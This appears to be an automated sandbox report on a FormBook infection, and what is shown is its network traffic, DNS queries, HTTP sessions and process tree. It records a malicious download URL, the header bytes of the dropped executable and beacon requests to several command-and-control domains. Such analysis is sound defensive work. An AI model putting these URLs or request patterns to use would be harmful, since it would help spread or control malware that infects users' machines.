                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057324886 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057332039 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057353020 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057358980 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057374954 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057394028 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057399988 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057411909 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057435989 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057462931 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057481050 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057501078 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057518959 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057542086 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057552099 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057569027 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057573080 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057593107 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057609081 CET4916880192.168.2.22103.140.251.164

                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.297571898 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357660055 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.863348007 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.942740917 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:09.647248030 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:09.710748911 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.720684052 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.798178911 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.293311119 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.533358097 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.285974979 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.359603882 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.759540081 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.838535070 CET53560098.8.8.8192.168.2.22

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.297571898 CET192.168.2.228.8.8.80xd44bStandard query (0)ow.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357660055 CET192.168.2.228.8.8.80xd44bStandard query (0)ow.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.863348007 CET192.168.2.228.8.8.80x7c8Standard query (0)algreenstdykeghestqw.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:09.647248030 CET192.168.2.228.8.8.80x2e78Standard query (0)www.evoslancete.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.720684052 CET192.168.2.228.8.8.80x2f03Standard query (0)www.fashionwatchesstore.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.293311119 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.athara-kiano.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.285974979 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.overseaexpert.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.759540081 CET192.168.2.228.8.8.80xf09aStandard query (0)www.oryanomer.comA (IP address)IN (0x0001)

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.57.56A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.183.132.164A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.120.65A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.183.131.91A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.62.204A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.57.56A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.183.131.91A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.183.132.164A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.120.65A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.62.204A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.942740917 CET8.8.8.8192.168.2.220x7c8No error (0)algreenstdykeghestqw.dns.army103.140.251.164A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:09.710748911 CET8.8.8.8192.168.2.220x2e78Name error (3)www.evoslancete.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.798178911 CET8.8.8.8192.168.2.220x2f03No error (0)www.fashionwatchesstore.com104.21.61.250A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.798178911 CET8.8.8.8192.168.2.220x2f03No error (0)www.fashionwatchesstore.com172.67.217.64A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.533358097 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.athara-kiano.comathara-kiano.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.533358097 CET8.8.8.8192.168.2.220x3c4eNo error (0)athara-kiano.com103.251.44.218A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.359603882 CET8.8.8.8192.168.2.220x6ec7No error (0)www.overseaexpert.comoverseaexpert.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.359603882 CET8.8.8.8192.168.2.220x6ec7No error (0)overseaexpert.com191.96.163.202A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.838535070 CET8.8.8.8192.168.2.220xf09aNo error (0)www.oryanomer.comoryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.838535070 CET8.8.8.8192.168.2.220xf09aNo error (0)oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com52.57.196.177A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.838535070 CET8.8.8.8192.168.2.220xf09aNo error (0)oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com18.195.132.44A (IP address)IN (0x0001)

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • ow.ly
                                                                                                                                                                                                        • algreenstdykeghestqw.dns.army
                                                                                                                                                                                                        • www.fashionwatchesstore.com
                                                                                                                                                                                                        • www.athara-kiano.com
                                                                                                                                                                                                        • www.overseaexpert.com

                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        0192.168.2.224916754.67.57.5680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.626580000 CET0OUTGET /omCE30rxT5x HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                        Host: ow.ly
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.840116024 CET1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: http://algreenstdykeghestqw.dns.army/receipat/winlog.exe?platform=hootsuite
                                                                                                                                                                                                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: master-only
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:26:02 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        X-Pool: owly_web


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        1192.168.2.2249168103.140.251.16480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.166852951 CET2OUTGET /receipat/winlog.exe?platform=hootsuite HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Host: algreenstdykeghestqw.dns.army
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389307976 CET3INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:26:00 GMT
                                                                                                                                                                                                        Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                                                                        Last-Modified: Tue, 23 Feb 2021 07:55:07 GMT
                                                                                                                                                                                                        ETag: "35218-5bbfc3ca9d9e8"
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 217624
                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5f d7 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 78 02 00 00 04 00 00 86 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 03 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 80 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 7c 09 00 00 00 80 03 00 00 0a 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG*_PGPFIPG*_PGswPG.VAPGRichPGPEL_$_fx4@@D|.textef `.rdataj@@.dataXU~@.ndata.rsrc|@@


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        2192.168.2.2249169104.21.61.25080C:\Windows\explorer.exe
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.847470045 CET233OUTGET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1
                                                                                                                                                                                                        Host: www.fashionwatchesstore.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.275433064 CET234INHTTP/1.1 401.1 Unauthorized
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:15 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: __cfduid=d3952bf084d888117c82a1d2dca71090e1614072434; expires=Thu, 25-Mar-21 09:27:14 GMT; path=/; domain=.fashionwatchesstore.com; HttpOnly; SameSite=Lax
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        cf-request-id: 086fcfe8bf00004e138929f000000001
                                                                                                                                                                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1hpP4drIbnTPup7R%2BneVNCvn3ziHhYEXy7Bfs5HWyLnKg3AuVrK25htuzaIQ5yjDZzGHpeOeu%2BasfhUsOTaLLpPnHmavrF9L7rSfcWPR4kjZaxJXalXOfrRBmnE%3D"}],"max_age":604800}
                                                                                                                                                                                                        NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 625fe8edf9f54e13-FRA
                                                                                                                                                                                                        Data Raw: 36 35 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e e8 8a 92 e6 9e 9c e8 a7 86 e9 a2 91 2f e5 a4 a9 e5 a4 a9 e7 9c 8b e7 89 87 e5 a4 a9 e5 a4 a9 e7 88 bd 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0d 0a 2a 7b 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 3b 7d 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 3f 33 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c
                                                                                                                                                                                                        Data Ascii: 65c<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>/</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no"><STYLE type="text/css"> *{margin:0px auto;} BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE><script type="text/javascript" src="/tj.js?3"></script></HEAD><BODY><


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        3192.168.2.2249170103.251.44.21880C:\Windows\explorer.exe
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.771933079 CET236OUTGET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1
                                                                                                                                                                                                        Host: www.athara-kiano.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240080118 CET236INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                                                                        Location: https://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:21 GMT
                                                                                                                                                                                                        Server: LiteSpeed


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        4192.168.2.2249171191.96.163.20280C:\Windows\explorer.exe
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.555535078 CET237OUTGET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1
                                                                                                                                                                                                        Host: www.overseaexpert.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751426935 CET238INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:26 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 73 61 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nsag/ was not found on this server.</p></body></html>


                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:25:50
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                        Imagebase:0x13f880000
                                                                                                                                                                                                        File size:27641504 bytes
                                                                                                                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:11
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:543304 bytes
                                                                                                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:14
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:217624 bytes
                                                                                                                                                                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
